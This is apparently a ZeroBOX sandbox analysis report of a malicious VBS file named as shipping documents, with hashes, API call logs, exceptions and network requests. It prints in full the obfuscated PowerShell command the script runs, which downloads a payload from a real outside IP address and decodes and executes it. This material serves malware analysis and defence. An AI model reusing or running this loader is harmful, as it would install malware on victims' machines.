Summary | ZeroBOX

SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6402 July 13, 2023, 8:56 a.m. July 13, 2023, 8:59 a.m.
Size 5.3KB
Type ASCII text, with CRLF line terminators
MD5 0bbe430413435af44cd3af7dd542d158
SHA256 d6d6d837cf218e5f89c6eb733437a7a9f8fc74e43545409fd487c16d83808bed
CRC32 23CDF84A
ssdeep 96:bDW4xFZiEBpDD/tIPLC0kn5afwKFdKuFf3Tr/wL7Bb+cXfU49U5BAPA0p4:bjx/13DtIPLb6KfFfH/gw5CXy
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs

    3048
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo 
PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar 
');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"

      2196

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
91.244.197.9 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647b40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00648000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00647780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05087468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05089468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05088468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050884a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x050884e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 74 05 f3 5b 7c b1 99 1d 8e b7 00 84 e4 5e 66 a9
exception.instruction: je 0x6fc7fdc
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc7fd5
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 84956288
registers.ebp: 102818684
registers.edx: 117207040
registers.ebx: 117207040
registers.esi: 102818672
registers.ecx: 256
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc f0 7e 2b 1e 62 a7 b5 53 bb 1f 06 6a 36 81 eb
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc7fe8
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 84956288
registers.ebp: 102818684
registers.edx: 117207040
registers.ebx: 117207040
registers.esi: 2001474698
registers.ecx: 117210996
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 76 05 e9 e5 83 49 6c b7 68 19 d3 6b 95 a8 33 83
exception.instruction: jbe 0x6fc801e
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc8017
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 102818672
registers.ebp: 102818684
registers.edx: 117207040
registers.ebx: 256
registers.esi: 2001474698
registers.ecx: 117210996
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 75 08 ef d5 ba e6 5c 93 e1 20 95 5a 9e ab 83 d6
exception.instruction: jne 0x6fc8069
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc805f
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 1961295872
registers.ebp: 102818684
registers.edx: 102818672
registers.ebx: 6181448
registers.esi: 256
registers.ecx: 16
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 33 f1 be d6 3e ab 9c 00 5b 89 85 98 00 00 00
exception.instruction: mov dword ptr [ebx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc80a5
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 64682
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ed 5b 63 7e 5e 86 d7 59 56 b1 c4 48 12 a7 db
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc80b5
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 33 ff 25 8a 98 00 5b 89 95 a5 01 00 00 ba 83
exception.instruction: mov dword ptr [ebx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fc80dc
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 22336
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 77 04 f4 9a 97 2a 9b ec af 8c 66 00 81 7d 7c 50
exception.instruction: ja 0x6fc8110
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fc810a
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 256
registers.ebx: 102818672
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc e8 04 28 4f 52 76 21 55 8e a1 91 6b b3 2a 88
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc8139
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 12288
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc eb d0 f3 9b 44 26 0f 6c ef 71 57 09 00 76 85
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc8149
registers.esp: 102818684
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 12288
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
GetStartupInfoA-0x10e00 kernel32+0x0 @ 0x74e70000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ea 57 99 e8 21 4f 4f 9f 3c 0a 5c cb 7c 95 1b
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fc815d
registers.esp: 102818680
registers.edi: 117210658
registers.eax: 1961482242
registers.ebp: 102818684
registers.edx: 12288
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 37 ed 44 06 a1 c2 63 6b d0 24 ea 2e 61 ff a5
exception.instruction: mov dword ptr [edi], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0bdf
registers.esp: 102818672
registers.edi: 54251
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 4140708668
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 76 0a ed 12 60 3d 46 14 e4 de 73 4d 16 f5 48 7f
exception.instruction: jbe 0x6fe0c26
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0c1a
registers.esp: 102818668
registers.edi: 256
registers.eax: 102818664
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ea 5d 26 21 ba f6 43 8b 1a fe c4 59 87 a7 b8
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0c35
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 3a f6 b1 24 68 c2 cb 54 b3 cd d0 7d 00 5a 81
exception.instruction: mov dword ptr [edx], edi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0c6b
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 11062
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc eb 04 2a d5 9d 30 e4 03 74 d1 e8 d6 74 0b da
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0c80
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 75 07 f2 5e 5a 8a 78 95 66 00 84 c0 5a 80 fd 4f
exception.instruction: jne 0x6fe0cbd
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0cb4
registers.esp: 102818668
registers.edi: 256
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 102818664
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ff 23 71 10 90 30 52 ba 63 6e e2 05 81 f2 d5
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0ce2
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 4
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 32 f4 0b b1 08 06 7a 10 b9 ad 00 5a 53 bb 31
exception.instruction: mov dword ptr [edx], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d01
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 11099
registers.ebx: 109186848
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 0b f7 e5 22 a2 a0 29 00 61 ff 22 e4 cf 00 5b
exception.instruction: mov dword ptr [ebx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d26
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 4
registers.ebx: 63062
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 30 f1 34 ad 97 4a 53 00 58 c7 03 58 71 ec cf
exception.instruction: mov dword ptr [eax], esi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d4e
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 45631
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 3f f3 ad 16 12 f3 67 db 0b 00 5f 50 b8 8f 73
exception.instruction: mov dword ptr [edi], edi
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0d88
registers.esp: 102818672
registers.edi: 16902
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 10 e9 87 b0 87 27 61 d1 98 d1 62 e1 2a ce 9d
exception.instruction: mov dword ptr [eax], edx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0da4
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 28623
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 70 07 f4 55 35 e6 ef 3a ce 3d b6 00 81 f9 d7 51
exception.instruction: jo 0x6fe0de6
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0ddd
registers.esp: 102818668
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 102818664
registers.ebx: 109186852
registers.esi: 256
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ea a3 63 ab 66 c5 95 db 75 76 c1 79 22 ac 9f
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0dfe
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186852
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 18 eb 22 81 85 9c f8 7c 07 68 e3 33 cb a8 39
exception.instruction: mov dword ptr [eax], ebx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0e37
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 25119
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186856
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 12 ff ec 21 2a 00 5a 81 2b f1 aa 98 56 81 33
exception.instruction: mov dword ptr [edx], edx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0e6f
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 45940
registers.ebx: 109186856
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc ff 18 2a 89 43 0c 81 b5 3a 02 00 00 43 43 7f
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0e8d
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186856
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 78 09 ec e5 19 cf c4 c6 1d 0f 60 2b 16 c0 dd b2
exception.instruction: js 0x6fe0ed1
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0ec6
registers.esp: 102818668
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186856
registers.esi: 256
registers.ecx: 102818664
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 89 0b ed bd d4 c7 b4 d7 af 8c 2c b3 f8 14 a1 7e
exception.instruction: mov dword ptr [ebx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6fe0f07
registers.esp: 102818672
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 9303
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: cc f0 c8 9f 5c 13 27 29 57 bf e7 83 f0 3a 81 f7
exception.instruction: int3
exception.exception_code: 0x80000003
exception.symbol:
exception.address: 0x6fe0f27
registers.esp: 102818676
registers.edi: 117210658
registers.eax: 109186848
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186860
registers.esi: 6181472
registers.ecx: 1216
1 0 0

__exception__

stacktrace:
DbgUserBreakPoint-0x10008 ntdll+0x0 @ 0x77470000
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa

exception.instruction_r: 7c 05 ee 51 e5 cf 34 1d c3 27 9d 91 db a3 d3 fe
exception.instruction: jl 0x6fe0f5d
exception.exception_code: 0x80000004
exception.symbol:
exception.address: 0x6fe0f56
registers.esp: 102818668
registers.edi: 256
registers.eax: 102818664
registers.ebp: 102818684
registers.edx: 1962118595
registers.ebx: 109186860
registers.esi: 6181472
registers.ecx: 1216
1 0 0

suspicious_features Connection to IP address suspicious_request HEAD http://91.244.197.9/new/Unsl.java
suspicious_features Connection to IP address suspicious_request GET http://91.244.197.9/new/Unsl.java
request HEAD http://91.244.197.9/new/Unsl.java
request GET http://91.244.197.9/new/Unsl.java
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
